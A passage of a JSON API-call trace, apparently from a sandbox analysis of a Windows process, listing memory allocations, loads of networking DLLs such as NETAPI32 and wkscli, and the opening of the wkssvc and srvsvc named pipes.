"0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba45000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 200 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba48000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 201 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba4b000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 202 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba4e000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 203 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba51000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 204 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba54000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 205 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba57000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 206 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba5a000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 207 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba5b000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 208 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba5e000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 209 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba61000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 210 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba64000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 211 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba67000" }, { "name": "RegionSize", "value": "0x00021000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 212 }, { "timestamp": "2025-11-20 10:58:33,835", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba88000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 213 }, { "timestamp": "2025-11-20 10:58:33,850", "thread_id": "4244", "caller": "0x7ff79aaf4895", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba8d000" }, { "name": "RegionSize", "value": "0x00012000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 214 }, { "timestamp": "2025-11-20 10:58:33,850", "thread_id": "4244", "caller": "0x7ff79aaf4895", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x00100000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 215 }, { "timestamp": "2025-11-20 10:58:33,850", "thread_id": "4244", "caller": "0x7ff79aaf4895", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x00004000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 216 }, { "timestamp": "2025-11-20 10:58:33,850", "thread_id": "4244", "caller": "0x7ff79aaf48d0", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba3e000" }, { "name": "RegionSize", "value": "0x0000a000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 217 }, { "timestamp": "2025-11-20 10:58:33,850", "thread_id": "4244", "caller": "0x7ff79aaf48d0", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba3e000" }, { "name": "RegionSize", "value": "0x00019000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 218 }, { "timestamp": "2025-11-20 10:58:33,850", "thread_id": "4244", "caller": "0x7ff79aaf906c", "parentcaller": "0x7ff79aaf8cc3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba99000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 219 }, { "timestamp": "2025-11-20 10:58:33,850", "thread_id": "4244", "caller": "0x7ff79aaf4661", "parentcaller": "0x7ff79aaf906c", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc14000" }, { "name": "RegionSize", "value": "0x00043000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 220 }, { "timestamp": "2025-11-20 10:58:33,866", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c125000" }, { "name": "RegionSize", "value": "0x0001f000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 221 }, { "timestamp": "2025-11-20 10:58:33,866", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c147000" }, { "name": "RegionSize", "value": "0x00018000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 222 }, { "timestamp": "2025-11-20 10:58:33,866", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\NETAPI32" }, { "name": "DllBase", "value": "0x7ffec3b80000" } ], "repeated": 0, "id": 223 }, { "timestamp": "2025-11-20 10:58:33,866", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "NETAPI32.DLL" }, { "name": "BaseAddress", "value": "0x7ffec3b80000" } ], "repeated": 0, "id": 224 }, { "timestamp": "2025-11-20 10:58:33,866", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000039c" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\samcli.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 225 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003a8" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed5050000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00019000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 226 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\SAMCLI" }, { "name": "DllBase", "value": "0x7ffed5050000" } ], "repeated": 0, "id": 227 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000039c" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\srvcli.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 228 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003ac" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed6e00000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00028000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 229 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\SRVCLI" }, { "name": "DllBase", "value": "0x7ffed6e00000" } ], "repeated": 0, "id": 230 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003ac" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\netutils.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 231 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003b0" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0060000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0000c000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 232 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\NETUTILS" }, { "name": "DllBase", "value": "0x7ffee0060000" } ], "repeated": 0, "id": 233 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003ac" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\logoncli.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 234 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003b4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0070000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00043000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 235 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\LOGONCLI" }, { "name": "DllBase", "value": "0x7ffee0070000" } ], "repeated": 0, "id": 236 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003b8" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\schedcli.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 237 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003bc" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed9490000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0000c000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 238 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\SCHEDCLI" }, { "name": "DllBase", "value": "0x7ffed9490000" } ], "repeated": 0, "id": 239 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003b8" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wkscli.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 240 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003c0" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedfcf0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00019000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 241 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\WKSCLI" }, { "name": "DllBase", "value": "0x7ffedfcf0000" } ], "repeated": 0, "id": 242 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003c0" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\dsrole.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 243 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003c4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedc560000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0000a000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 244 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\DSROLE" }, { "name": "DllBase", "value": "0x7ffedc560000" } ], "repeated": 0, "id": 245 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "wkscli.dll" }, { "name": "BaseAddress", "value": "0x7ffedfcf0000" } ], "repeated": 0, "id": 246 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003d0" }, { "name": "DesiredAccess", "value": "0xc0100080", "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PIPE\\wkssvc" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 247 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003d0" }, { "name": "HandleName", "value": "\\Device\\NamedPipe\\wkssvc" }, { "name": "FileInformationClass", "value": "23", "pretty_value": "FilePipeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 248 }, { "timestamp": "2025-11-20 10:58:33,882", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003d0" }, { "name": "HandleName", "value": "\\Device\\NamedPipe\\wkssvc" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x02\\x00\\x00\\x00" } ], "repeated": 0, "id": 249 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003d0" }, { "name": "HandleName", "value": "\\Device\\NamedPipe\\wkssvc" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8\\xe9\\xa0+\\x1e\\x02\\x00\\x00" } ], "repeated": 0, "id": 250 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\cscapi" }, { "name": "DllBase", "value": "0x7ffece280000" } ], "repeated": 0, "id": 251 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "cscapi.dll" }, { "name": "BaseAddress", "value": "0x7ffece280000" } ], "repeated": 0, "id": 252 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003e4" }, { "name": "DesiredAccess", "value": "0xc0100080", "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "\\??\\PIPE\\srvsvc" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 253 }, { "timestamp": "2025-11-20 10:58:33,897", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, 